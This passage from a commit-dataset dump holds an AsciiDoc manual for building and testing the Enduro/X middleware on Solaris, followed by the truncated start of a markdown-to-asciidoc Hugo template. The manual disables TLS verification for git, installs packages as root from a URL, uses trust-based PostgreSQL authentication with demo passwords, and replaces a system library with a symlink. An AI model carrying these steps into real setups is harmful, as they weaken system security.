Solaris Studio\n\nThe compilation will be done in 64bit mode.\n\n=== Solaris 11\n\n---------------------------------------------------------------------\n$ cd \\$HOME\/endurox\n$ cmake -DCMAKE_INSTALL_PREFIX:PATH=`pwd`\/dist -DDEFINE_DISABLEGPGME=ON -DDEFINE_DISABLEDOC=ON .\n---------------------------------------------------------------------\n\nIn case errors like\n\n---------------------------------------------------------------------\nld: fatal: file \/usr\/lib\/values-xpg6.o: wrong ELF class: ELFCLASS32\n---------------------------------------------------------------------\n\nappear, a temporary solution is to replace that particular file with the 64bit version.\nIt appears that the Solaris Studio compiler ignores the \"-m64\" architecture flags\nand does not use \"\/usr\/lib\/amd64\/values-xpg6.o\" where required.\n\n---------------------------------------------------------------------\n# su - root\n# mv \/usr\/lib\/values-xpg6.o \/usr\/lib\/values-xpg6.o.OLD\n# ln -s \/usr\/lib\/amd64\/values-xpg6.o \/usr\/lib\/values-xpg6.o\n---------------------------------------------------------------------\n\n=== Solaris 10 (NOT SUPPORTED)\n\nThis assumes that GCC is installed, and \"ar\" from gcc will be used.\n\n---------------------------------------------------------------------\n$ cd \\$HOME\/endurox\n$ cmake -D CMAKE_AR=\/opt\/csw\/gnu\/ar \\\n-DCMAKE_INSTALL_PREFIX:PATH=`pwd`\/dist -DDEFINE_DISABLEGPGME=ON -DDEFINE_DISABLEDOC=ON .\n---------------------------------------------------------------------\n\nSupport is not available for Solaris Studio on Solaris 10 due\nto Thread Local Storage errors like the following during linking:\n\n---------------------------------------------------------------------\nld: fatal: relocation error: R_SPARC_TLS_LDO_LOX10: file CMakeFiles\/nstd.dir\/ndebug.c.o: symbol $XBaBAqASPv3bHaz.__ndrx_debug__.first: bound to: CMakeFiles\/nstd.dir\/ndebug.c.o: relocation illegal when not bound to object being created\nld: fatal: relocation error: R_SPARC_TLS_LDO_ADD: file CMakeFiles\/nstd.dir\/ndebug.c.o: symbol $XBaBAqASPv3bHaz.__ndrx_debug__.first: bound to: CMakeFiles\/nstd.dir\/ndebug.c.o: relocation illegal when not bound to object being created\nld: fatal: relocation error: R_SPARC_TLS_LDO_HIX22: file CMakeFiles\/nstd.dir\/ndebug.c.o: symbol $XBaBAqASPv3bHaz.__ndrx_debug__.ostid: bound to: CMakeFiles\/nstd.dir\/ndebug.c.o: relocation illegal when not bound to object being created\nld: fatal: relocation error: R_SPARC_TLS_LDO_LOX10: file CMakeFiles\/nstd.dir\/ndebug.c.o: symbol $XBaBAqASPv3bHaz.__ndrx_debug__.ostid: bound to: CMakeFiles\/nstd.dir\/ndebug.c.o: relocation illegal when not bound to object being created\nld: fatal: relocation error: R_SPARC_TLS_LDO_ADD: file CMakeFiles\/nstd.dir\/ndebug.c.o: symbol $XBaBAqASPv3bHaz.__ndrx_debug__.ostid: bound to: CMakeFiles\/nstd.dir\/ndebug.c.o: relocation illegal when not bound to object being created\nld: fatal: relocation error: R_SPARC_TLS_LDO_HIX22: file CMakeFiles\/nstd.dir\/ndebug.c.o: symbol $XBaBAqASPv3bHaz.__ndrx_debug__.ostid: bound to: CMakeFiles\/nstd.dir\/ndebug.c.o: relocation illegal when not bound to object being created\nld: fatal: relocation error: R_SPARC_TLS_LDO_LOX10: file CMakeFiles\/nstd.dir\/ndebug.c.o: symbol $XBaBAqASPv3bHaz.__ndrx_debug__.ostid: bound to: CMakeFiles\/nstd.dir\/ndebug.c.o: relocation illegal when not bound to object being created\nld: fatal: relocation error: R_SPARC_TLS_LDO_ADD: file CMakeFiles\/nstd.dir\/ndebug.c.o: symbol $XBaBAqASPv3bHaz.__ndrx_debug__.ostid: bound to: CMakeFiles\/nstd.dir\/ndebug.c.o: relocation illegal when not bound to object being created\n---------------------------------------------------------------------\n\nThus at this time only GCC is supported for Solaris 10.\n\n\n== Building the code\n\n---------------------------------------------------------------------\n$ cd \\$HOME\/endurox\n$ make \n$ make install\n---------------------------------------------------------------------\n\nThis will produce binaries in the '\\$HOME\/endurox\/dist' folder.\n
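\nAs a quick smoke test of the produced binaries (a hedged sketch; `xadmin` is the Enduro\/X administration utility, and the call assumes the 'ndrx_home' environment created above has been sourced):\n\n---------------------------------------------------------------------\n$ ls \\$HOME\/endurox\/dist\/bin | head\n$ xadmin help\n---------------------------------------------------------------------\n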
\n== Unit Testing\n\nEnduro\/X basically consists of two parts:\n. XATMI runtime;\n. UBF\/FML buffer processing. \nEach of these two sub-systems has its own unit tests.\n\n=== UBF\/FML Unit testing\n\n---------------------------------------------------------------------\n$ cd \\$HOME\/endurox\/sampleconfig\n$ source setndrx\n$ cd \\$HOME\/endurox\/ubftest\n$ .\/ubfunit1 2>\/dev\/null\nRunning \"main\" (76 tests)...\nCompleted \"ubf_basic_tests\": 198 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_Badd_tests\": 225 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_genbuf_tests\": 334 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_cfchg_tests\": 2058 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_cfget_tests\": 2232 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_fdel_tests\": 2303 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_expr_tests\": 3106 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_fnext_tests\": 3184 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_fproj_tests\": 3548 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_mem_tests\": 4438 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_fupdate_tests\": 4613 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_fconcat_tests\": 4768 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_find_tests\": 5020 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_get_tests\": 5247 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_print_tests\": 5655 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_macro_tests\": 5666 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_readwrite_tests\": 5764 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_mkfldhdr_tests\": 5770 passes, 0 failures, 0 exceptions.\nCompleted \"main\": 5770 passes, 0 failures, 0 exceptions.\n\n---------------------------------------------------------------------\n\n=== XATMI Unit testing\nATMI testing might take some time. Also ensure that you have a few gigabytes of free \ndisk space, as logging requires some space (about ~10 GB).\n\n---------------------------------------------------------------------\n$ cd \\$HOME\/endurox\/atmitest\n$ nohup .\/run.sh &\n$ tail -f \\$HOME\/endurox\/atmitest\/test.out\n...\n************ FINISHED TEST: [test028_tmq\/run.sh] with 0 ************\nCompleted \"atmi_test_all\": 28 passes, 0 failures, 0 exceptions.\nCompleted \"main\": 28 passes, 0 failures, 0 exceptions.\n---------------------------------------------------------------------\n
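\nBecause the logs consume roughly 10 GB, it can help to keep an eye on the free space while the suite runs (a trivial sketch):\n\n---------------------------------------------------------------------\n$ df -h \\$HOME\n---------------------------------------------------------------------\n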
\n== Troubleshooting\n\nThis section lists some notes about fixing the most common problems with the Solaris build.\n\n=== Problems with library modes\n\nIf you have issues with linking a particular library version, for example when building\nin 64bit mode CMake for some reason links with 32bit libs (for example\nwith PostgreSQL), then the *CMAKE_LIBRARY_PATH* flag may be applied to\npoint to the correct path for the libraries. For example:\n\n---------------------------------------------------------------------\n$ cmake -DCMAKE_INSTALL_PREFIX:PATH=`pwd`\/dist -DDEFINE_DISABLEDOC=ON\\\n -DENABLE_POSTGRES=ON -DDEFINE_DISABLEGPGME=ON -DCMAKE_LIBRARY_PATH=\/opt\/csw\/lib\/amd64 .\n---------------------------------------------------------------------\n
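\nTo see which flavor of a library actually lives on a given path, the `file` utility can be used (a sketch; the libpq paths are assumptions based on the OpenCSW layout used in this manual):\n\n---------------------------------------------------------------------\n$ file \/opt\/csw\/lib\/libpq.so\n$ file \/opt\/csw\/lib\/amd64\/libpq.so\n---------------------------------------------------------------------\n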
\n== Conclusions\n\nAt the finish you have a configured system which is ready to process transactions\nwith the Enduro\/X runtime. It is possible to copy the binary version ('dist') folder\nto other machines of the same architecture and run it there without the need of building.\n\n:numbered!:\n\n[bibliography]\nAdditional documentation \n------------------------\nThis section lists additional related documents.\n\n[bibliography]\n.Resources\n- [[[BINARY_INSTALL]]] See Enduro\/X 'binary_install' manual.\n\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\nThe index is normally left completely empty, its contents being\ngenerated automatically by the DocBook toolchain.\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n","old_contents":"Building Enduro\/X On Oracle Solaris Platform\n============================================\nMadars Vitolins\nv1.0, 2016-06:\n\tInitial draft\n:doctype: book\n\n== About manual\n\nThis manual describes how to build 'Enduro\/X' Oracle Solaris platform. \nDocument is based on Solaris 11 on x86 machine. Compiler used to Enduro\/X is GCC.\n\n== Overview\n\nThis manual includes basic installation of Enduro\/X which does not \ninclude building of documentation and does not use GPG-ME encryption for bridges.\n\nEnduro\/X on Solaris platform is Using System V message queues.\n\n\n== Operating System Configuration\n\nFor OS configuration settings \nsee ex_adminman(guides)(Enduro\/X Administration Manual, Setup System chapter).\nThis step is mandatory be executed, before continuing.\n\n== Installation process\n\nThe installation process will install required pen source packages from \n'http:\/\/www.opencsw.org'. You may install packages with different approach. \nThis is just a sample process for getting build system working on under Solaris.\nFor getting Enduro\/X to work basically we need following packages:\n\n. git\n\n. cmake\n\n. flex\n\n. bison\n\n. libxml2\n\n. gcc\/g++\n\n=== Packages to be installed\n\nThe following operations will be done from root user. This will download\nand install open source packages to local machine:\n\n---------------------------------------------------------------------\n$ su - root\n# pkgadd -d http:\/\/get.opencsw.org\/now\n# \/opt\/csw\/bin\/pkgutil -U\n# \/opt\/csw\/bin\/pkgutil -y -i git libxml2_dev flex bison cmake gmake\n---------------------------------------------------------------------\n\n=== If installing GCC...\n\n---------------------------------------------------------------------\n$ su - root\n# \/opt\/csw\/bin\/pkgutil -y -i gcc4core gcc4g++\n---------------------------------------------------------------------\n\n=== If installing Sun Studio (on Solaris 11)...\n\n- According to: https:\/\/pkg-register.oracle.com\/register\/product_info\/6\/\n\n- Register and request access, download the \nand pkg.oracle.com.key.pem pkg.oracle.com.certificate.pem from Oracle\nto server.\n\nInstallation shows process for 12.4 version, but any later available should\nbe installed. 
Also note that *.profile* and *$HOME\/ndrx_home* later needs to \nmatch the path, for example *\/opt\/developerstudio12.6*.\n\n---------------------------------------------------------------------\n$ su - root\n# mkdir -m 0775 -p \/var\/pkg\/ssl\n# cp -i download-directory\/pkg.oracle.com.key.pem \/var\/pkg\/ssl\n# cp -i download-directory\/pkg.oracle.com.certificate.pem \/var\/pkg\/ssl\n\n# pkg set-publisher \\\n-k \/var\/pkg\/ssl\/pkg.oracle.com.key.pem \\\n-c \/var\/pkg\/ssl\/pkg.oracle.com.certificate.pem \\\n-G '*' -g https:\/\/pkg.oracle.com\/solarisstudio\/release solarisstudio\n\n# pkg list -af 'pkg:\/\/solarisstudio\/developer\/solarisstudio-124\/*'\n\n# pkg install -nv solarisstudio-124\n\n# pkg install solarisstudio-124\n---------------------------------------------------------------------\n\nIf plan to run \n\n=== If installing Sun Studio (on Solaris 10)...\n\nFirstly download the \"tarfile\" version from Oracle, visit \nhttp:\/\/www.oracle.com\/technetwork\/server-storage\/solarisstudio\/downloads\/tarfiles-studio-12-4-3048109.html\n\nNext once the tar file is on your server, extract it and start the install:\n\n---------------------------------------------------------------------\n# bzip2 -d SolarisStudio12.4-solaris-x86-bin.tar.bz2\n# tar -xf SolarisStudio12.4-solaris-x86-bin.tar\n# cd SolarisStudio12.4-solaris-x86-bin\n# .\/install_patches.sh\n# mv solarisstudio12.4 \/opt\n---------------------------------------------------------------------\n\nFor Solaris 10 also we need gmake to work as \"make\", thus\n---------------------------------------------------------------------\n# ln -s \/opt\/csw\/bin\/gmake \/usr\/bin\/make\n---------------------------------------------------------------------\n\nThis will put the compiler in \"\/opt\/solarisstudio12.4\" the path later used in\nthis tutorial.\n\nAlso for solaris 10 we need \"ar\" tool which we will use from GNU package:\n\n---------------------------------------------------------------------\n# \/opt\/csw\/bin\/pkgutil -y -i gcc4core gcc4g++\n---------------------------------------------------------------------\n\n== Getting the source code\n\nFirstly we need to add \"user1\" under which we will perform build actions.\nFor test purposes we will parepare new user for which Enduro\/X will built \n(this adds the in the path the \/opt\/csw\/bin. 
You may modify that of your needs.\n(add \/opt\/solarisstudio12.4\/bin if Sun studio is installed)\n\n=== Adding user on Solaris 11\nWe add the user \"user1\" and also set the open file limit to 4096, by\ndefault it is 256 which is too low for unit testing.\n\n---------------------------------------------------------------------\n$ su - root\n# useradd -m user1\n# passwd user1\n# projadd -K \"process.max-file-descriptor=(basic,10000,deny)\" enduroxproject\n# usermod -K \"project=enduroxproject\" user1\n# su - user1\n---------------------------------------------------------------------\n\n=== Adding user on Solaris 10\n\n---------------------------------------------------------------------\n$ su - root\n# useradd -d \\$HOME -m -s \/usr\/bin\/bash -c \"User1 User1\" user1\n# mkdir \\$HOME\n# chown user1:staff \\$HOME\n# su - user1\n---------------------------------------------------------------------\n\n=== Preparing the user environment\n\n---------------------------------------------------------------------\n\n$ bash\n$ cat << EOF >> .profile\nexport PATH=$PATH:\/opt\/csw\/bin:\/opt\/solarisstudio12.4\/bin\nEOF\n$ chmod +x .profile\n$ source .profile\n$ cd \\$HOME\n$ GIT_SSL_NO_VERIFY=true git clone https:\/\/github.com\/endurox-dev\/endurox\n$ cd endurox \n$ git config http.sslVerify \"false\"\n---------------------------------------------------------------------\n\n=== Enduro\/X basic Environment configuration for HOME directory\n\nThis code bellow creates 'ndrx_home' executable file which loads basic environment, \nso that you can use sample configuration provided by Enduro\/X in 'sampleconfig' directory. \nThis also assumes that you are going to install to '$HOME\/endurox\/dist' folder.\nThe file bellow will override the sample configuration.\n\n---------------------------------------------------------------------\n$ cat << EOF > $HOME\/ndrx_home\n#!\/bin\/bash\n\necho \"Loading ndrx_home...\"\n# Where app domain lives\nexport NDRX_APPHOME=$HOME\/endurox\n# Where NDRX runtime lives\nexport NDRX_HOME=\\$HOME\/endurox\/dist\/bin\n# Debug config too\nexport NDRX_DEBUG_CONF=\\$HOME\/endurox\/sampleconfig\/debug.conf\n# NDRX config too.\nexport NDRX_CONFIG=\\$HOME\/endurox\/sampleconfig\/ndrxconfig.xml\n\nexport FLDTBLDIR=\\$HOME\/endurox\/ubftest\/ubftab\n\nexport PATH=\/usr\/bin:\/usr\/sbin:\/opt\/csw\/bin:\/opt\/solarisstudio12.4\/bin:\/opt\/csw\/bin:\\$HOME\/endurox\/dist\/bin\nexport LD_LIBRARY_PATH=\/usr\/lib\/sparcv9:\\$HOME\/endurox\/dist\/lib64:\/opt\/solarisstudio12.4\/lib:\/usr\/lib64:\/opt\/csw\/lib\/64\n\n################################################################################\n# In case if building with Postgresql DB database testing support\n# or building endurox-java with Oracle DB tests (03_xapostgres), then\n# configure bellow setting (demo values provided):\n# If so - uncomment bellow\n################################################################################\n#export EX_PG_HOST=localhost\n#export EX_PG_USER=exdbtest\n#export EX_PG_PASS=exdbtest1\n# currently uses default port\n#export EX_PG_PORT=5432\n#export EX_PG_DB=xe\n\n#\n# If using PostgreSQL for Solaris 11 uncomment:\n#\n#export PATH=$PATH:\/opt\/csw\/libexec\/postgresql\/93\n\n\nEOF\n\n$ chmod +x $HOME\/ndrx_home\n---------------------------------------------------------------------\n\n=== Configuring PostgreSQL\n\nIf Enduro\/X PostgreSQL driver is needed to be build for AIX, the PostgreSQL\nneeds to be installed for build and test purposes. 
On Solaris 10, PostgreSQL\ncomes with the operating system, thus only access rights and users needs to be\nconfigured.\n\nNote if you plan to use ECPG mode, then ecpg pre-compiler needs to know where\nthe ecpg libraries live. Thus LD_LIBRARY_PATH must be set during the build time.\n\nIt can be done in following way:\n\n--------------------------------------------------------------------------------\n\n# su - user1\n$ cat << EOF >> .profile\nexport LD_LIBRARY_PATH=\/opt\/csw\/lib\/amd64\nEOF\n\n--------------------------------------------------------------------------------\n\nafter this login and log out from user1 to apply the .profile settings.\n\nAlso to active the PostgreSQL inclusion to the build, add *-DENABLE_POSTGRES=ON*\nflag to cmake command line (later in build section).\n\nFor Solaris 11 it needs to be installed:\n\n--------------------------------------------------------------------------------\n\n$ su - root\n\n-- Install with:\n# \/opt\/csw\/bin\/pkgutil -y -i postgresql93\n\n-- Install dev\n# \/opt\/csw\/bin\/pkgutil -y -i postgresql_dev\n\n-- enable for auto start\n# svcadm enable cswpostgresql-93\n\n# su - postgres\n\n-- Create profile entry to have path to postgres binaries\n\n$ cat << EOF > ~\/.profile\n\n#!\/bin\/bash\n\nexport PATH=$PATH:\/opt\/csw\/libexec\/postgresql\/93\/\n\nEOF\n\n$ chmod +x ~\/.profile\n\n-- Start postgres from Postgres user\n$ \/opt\/csw\/bin\/pg_ctl-93 -D \/var\/opt\/csw\/postgresql\/93 -l logfile start\nserver starting \n\n\n\n--------------------------------------------------------------------------------\n\nFor Solaris 10, just enable it:\n\n--------------------------------------------------------------------------------\n\n$ su - root\n# svcadm enable svc:\/application\/database\/postgresql:version_82\n\n--------------------------------------------------------------------------------\n\nNow create the database for Enduro\/X tests (Solaris 10 & 11):\n\n--------------------------------------------------------------------------------\n# su - postgres\n\n$ createuser exdbtest\n\n$ createdb xe\n\n$ psql -d template1\n\n> alter user exdbtest with encrypted password 'exdbtest1';\n> grant all privileges on database xe to exdbtest;\n> \\q\n\n--------------------------------------------------------------------------------\n\nConfiguration files needs to be updated for authentication and distributed\ntransactions must be enabled too.\n\nEdit *postgresql.conf*, set \"max_prepared_transactions\"\nto 1000.\n\nSolaris 10: *\/var\/postgres\/8.2\/data\/postgresql.conf*\n\nSolaris 11(.4): *\/var\/opt\/csw\/postgresql\/93\/postgresql.conf*\n\n--------------------------------------------------------------------------------\n\nmax_prepared_transactions = 1000 # zero disables the feature\n\n--------------------------------------------------------------------------------\n\nFor access permissions and network configuration, update \n*pg_hba.conf*, so that it contains following:\n\nSolaris 10: *\/var\/postgres\/8.2\/data\/pg_hba.conf*\n\nSolaris 11: *\/var\/opt\/csw\/postgresql\/93\/pg_hba.conf*\n\n--------------------------------------------------------------------------------\n\nlocal all all trust\nhost all all 127.0.0.1\/32 md5\nhost all all ::1\/128 md5\n\n--------------------------------------------------------------------------------\n\nRestart PostgreSQL, Solaris 10:\n\n--------------------------------------------------------------------------------\n\n# svcadm restart 
svc:\/application\/database\/postgresql:version_82\n\n--------------------------------------------------------------------------------\n\nRestart PostgreSQL, Solaris 11:\n\n--------------------------------------------------------------------------------\n\n# svcadm restart cswpostgresql-93\n\n--------------------------------------------------------------------------------\n\n== Building the code with GCC\n\nIt is assumed that gcc is default compiler on the system (i.e. Oracle Studio not installed), \nthus following cmake will pick up gcc by default:\n\n=== Solaris 11\n\n---------------------------------------------------------------------\n$ cd \\$HOME\/endurox\n$ cmake -DCMAKE_CXX_COMPILER=g++ -DCMAKE_C_COMPILER=gcc\\\n-DDEFINE_DISABLEDOC=ON -DDEFINE_DISABLEGPGME=ON -DCMAKE_INSTALL_PREFIX:PATH=`pwd`\/dist -DCMAKE_LIBRARY_PATH=\/opt\/csw\/lib\/amd64 .\n$ make \n$ make install\n---------------------------------------------------------------------\n\n=== Solaris 10\n\nAlso note that CC variable needs to be exported as it is used by \nbuildclient script for view test cases.\n\n---------------------------------------------------------------------\n$ export CC=gcc\n$ cd \\$HOME\/endurox\n$ cmake -D CMAKE_AR=\/opt\/csw\/gnu\/ar -DCMAKE_CXX_COMPILER=g++ -DCMAKE_C_COMPILER=gcc \\\n-DDEFINE_DISABLEDOC=ON -DDEFINE_DISABLEGPGME=ON -DCMAKE_INSTALL_PREFIX:PATH=`pwd`\/dist .\n$ make \n$ make install\n---------------------------------------------------------------------\n\n\n== Building the code with Solaris Studio\n\nThe compilation will be done in 64bit mode\n\n=== Solaris 11\n\n---------------------------------------------------------------------\n$ cd \\$HOME\/endurox\n$ cmake -DCMAKE_INSTALL_PREFIX:PATH=`pwd`\/dist -DDEFINE_DISABLEGPGME=ON -DDEFINE_DISABLEDOC=ON .\n---------------------------------------------------------------------\n\nIn case if errors like\n\n---------------------------------------------------------------------\nld: fatal: file \/usr\/lib\/values-xpg6.o: wrong ELF class: ELFCLASS32\n---------------------------------------------------------------------\n\nappears, temporary solution is to replace that particular file with 64bit version.\nIt appears that Solaris Studio compiler ignores the \"-m64\" architecture flags\nand does not use \"\/usr\/lib\/amd64\/values-xpg6.o\" where it requires.\n\n---------------------------------------------------------------------\n# su - root\n# mv \/usr\/lib\/values-xpg6.o \/usr\/lib\/values-xpg6.o.OLD\n# ln -s \/usr\/lib\/amd64\/values-xpg6.o \/usr\/lib\/values-xpg6.o\n---------------------------------------------------------------------\n\n=== Solaris 10 (NOT SUPPORTED)\n\nThis assumes that GCC is installed, and \"ar\" from gcc will be used.\n\n---------------------------------------------------------------------\n$ cd \\$HOME\/endurox\n$ cmake -D CMAKE_AR=\/opt\/csw\/gnu\/ar \\\n-DCMAKE_INSTALL_PREFIX:PATH=`pwd`\/dist -DDEFINE_DISABLEGPGME=ON -DDEFINE_DISABLEDOC=ON .\n---------------------------------------------------------------------\n\nThe support is not available for Solaris Studio on Solaris 10 due\nto Thread Local Storage errors like during the linking:\n\n---------------------------------------------------------------------\nld: fatal: relocation error: R_SPARC_TLS_LDO_LOX10: file CMakeFiles\/nstd.dir\/ndebug.c.o: symbol $XBaBAqASPv3bHaz.__ndrx_debug__.first: bound to: CMakeFiles\/nstd.dir\/ndebug.c.o: relocation illegal when not bound to object being created\nld: fatal: relocation error: R_SPARC_TLS_LDO_ADD: file 
CMakeFiles\/nstd.dir\/ndebug.c.o: symbol $XBaBAqASPv3bHaz.__ndrx_debug__.first: bound to: CMakeFiles\/nstd.dir\/ndebug.c.o: relocation illegal when not bound to object being created\nld: fatal: relocation error: R_SPARC_TLS_LDO_HIX22: file CMakeFiles\/nstd.dir\/ndebug.c.o: symbol $XBaBAqASPv3bHaz.__ndrx_debug__.ostid: bound to: CMakeFiles\/nstd.dir\/ndebug.c.o: relocation illegal when not bound to object being created\nld: fatal: relocation error: R_SPARC_TLS_LDO_LOX10: file CMakeFiles\/nstd.dir\/ndebug.c.o: symbol $XBaBAqASPv3bHaz.__ndrx_debug__.ostid: bound to: CMakeFiles\/nstd.dir\/ndebug.c.o: relocation illegal when not bound to object being created\nld: fatal: relocation error: R_SPARC_TLS_LDO_ADD: file CMakeFiles\/nstd.dir\/ndebug.c.o: symbol $XBaBAqASPv3bHaz.__ndrx_debug__.ostid: bound to: CMakeFiles\/nstd.dir\/ndebug.c.o: relocation illegal when not bound to object being created\nld: fatal: relocation error: R_SPARC_TLS_LDO_HIX22: file CMakeFiles\/nstd.dir\/ndebug.c.o: symbol $XBaBAqASPv3bHaz.__ndrx_debug__.ostid: bound to: CMakeFiles\/nstd.dir\/ndebug.c.o: relocation illegal when not bound to object being created\nld: fatal: relocation error: R_SPARC_TLS_LDO_LOX10: file CMakeFiles\/nstd.dir\/ndebug.c.o: symbol $XBaBAqASPv3bHaz.__ndrx_debug__.ostid: bound to: CMakeFiles\/nstd.dir\/ndebug.c.o: relocation illegal when not bound to object being created\nld: fatal: relocation error: R_SPARC_TLS_LDO_ADD: file CMakeFiles\/nstd.dir\/ndebug.c.o: symbol $XBaBAqASPv3bHaz.__ndrx_debug__.ostid: bound to: CMakeFiles\/nstd.dir\/ndebug.c.o: relocation illegal when not bound to object being created\n---------------------------------------------------------------------\n\nThus at this time only GCC is supported for Solaris 10.\n\n\n== Building the code\n\n---------------------------------------------------------------------\n$ cd \\$HOME\/endurox\n$ make \n$ make install\n---------------------------------------------------------------------\n\nThis will produce binaries in '\\$HOME\/endurox\/dist' folder.\n\n== Unit Testing\n\nEnduro\/X basically consists of two parts:\n. XATMI runtime;\n. UBF\/FML buffer processing. 
\nEach of these two sub-systems have own units tests.\n\n=== UBF\/FML Unit testing\n\n---------------------------------------------------------------------\n$ cd \\$HOME\/endurox\/sampleconfig\n$ source setndrx\n$ cd \\$HOME\/endurox\/ubftest\n$ .\/ubfunit1 2>\/dev\/null\nRunning \"main\" (76 tests)...\nCompleted \"ubf_basic_tests\": 198 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_Badd_tests\": 225 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_genbuf_tests\": 334 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_cfchg_tests\": 2058 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_cfget_tests\": 2232 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_fdel_tests\": 2303 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_expr_tests\": 3106 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_fnext_tests\": 3184 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_fproj_tests\": 3548 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_mem_tests\": 4438 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_fupdate_tests\": 4613 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_fconcat_tests\": 4768 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_find_tests\": 5020 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_get_tests\": 5247 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_print_tests\": 5655 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_macro_tests\": 5666 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_readwrite_tests\": 5764 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_mkfldhdr_tests\": 5770 passes, 0 failures, 0 exceptions.\nCompleted \"main\": 5770 passes, 0 failures, 0 exceptions.\n\n---------------------------------------------------------------------\n\n=== XATMI Unit testing\nATMI testing might take some time. Also ensure that you have few Gigabytes of free \ndisk space, as logging requires some space (about ~10 GB).\n\n---------------------------------------------------------------------\n$ cd \\$HOME\/endurox\/atmitest\n$ nohup .\/run.sh &\n$ tail -f \\$HOME\/endurox\/atmitest\/test.out\n...\n************ FINISHED TEST: [test028_tmq\/run.sh] with 0 ************\nCompleted \"atmi_test_all\": 28 passes, 0 failures, 0 exceptions.\nCompleted \"main\": 28 passes, 0 failures, 0 exceptions.\n---------------------------------------------------------------------\n\n== Troubleshooting\n\nThis section lists some notes about fixing most common problems with Solaris build.\n\n=== Problems with library modes\n\nIf having issues with linking particular library version, for example building\nin 64bit mode, but for some reason CMake is linking with 32bit libs (for example\nwith PostgreSQL), then following flag may be applied *CMAKE_LIBRARY_PATH* to\npoint to correct path for libraries. For example:\n\n---------------------------------------------------------------------\n$ cmake -DCMAKE_INSTALL_PREFIX:PATH=`pwd`\/dist -DDEFINE_DISABLEDOC=ON\\\n -DENABLE_POSTGRES=ON -DDEFINE_DISABLEGPGME=ON -DCMAKE_LIBRARY_PATH=\/opt\/csw\/lib\/amd64 .\n---------------------------------------------------------------------\n\n== Conclusions\n\nAt finish you have a configured system which is read to process the transactions\nby Enduro\/X runtime. 
It is possible to copy the binary version ('dist') folder\nto other same architecture machines and run it there with out need of building.\n\n:numbered!:\n\n[bibliography]\nAdditional documentation \n------------------------\nThis section lists additional related documents.\n\n[bibliography]\n.Resources\n- [[[BINARY_INSTALL]]] See Enduro\/X 'binary_install' manual.\n\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\nThe index is normally left completely empty, it's contents being\ngenerated automatically by the DocBook toolchain.\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"dff7bdd0523a4d879327836c3ad1a2c7c7d62a05","subject":"Add markdown-to-asciidoc template","message":"Add markdown-to-asciidoc template\n\nThis is a very simple hackish regexp-based implementation, but works for\nthe simple formatting used by the current and past versions of the\ncovenant.\n\nI've gone ahead and manually checked all languages and versions and all\nseem to be correctly converted to asciidoc. Wohoo!\n","repos":"CoralineAda\/contributor_covenant","old_file":"layouts\/version\/single.adoc","new_file":"layouts\/version\/single.adoc","new_contents":"{{- \/*\nVery hacky way of converting markdown to asciidoc.\nBecause the covenant uses rather simple syntax, we can get away with this :)\n\nOrder of operations is:\n* Replace markdown # headers for = asciidoc\n* Transform links in the form of [text][reference] to text + remove reference links at end.\n This is similar to what the txt conversion does, and it's very hard to convert with just regexps -- if we want to\n keep these links it'll probably be easier to just convert them to [text](url) format.\n* Transform links in the form of [text](url) to asciidoc's link:url[text]\n* Transform links in the <url> form to asciidoc's link:url[url]\n\n*\/ -}}\n{{ .RawContent | replaceRE \"#\" \"=\" | replaceRE \"\\\\[([^\\\\]]*)\\\\][ \\\\n]*\\\\[[^\\\\]]*\\\\]\" \"$1\" | replaceRE \"\\\\[[^\\\\]]*\\\\]: .*\" \"\" | replaceRE \"\\\\[([^\\\\]]*)\\\\]\\\\((https{0,1}:.*)\\\\)\" \"link:$2[$1]\" | replaceRE \"<(https{0,1}:.*)>\" \"link:$1[$1]\" | safeHTML }}\n","old_contents":"Hello, 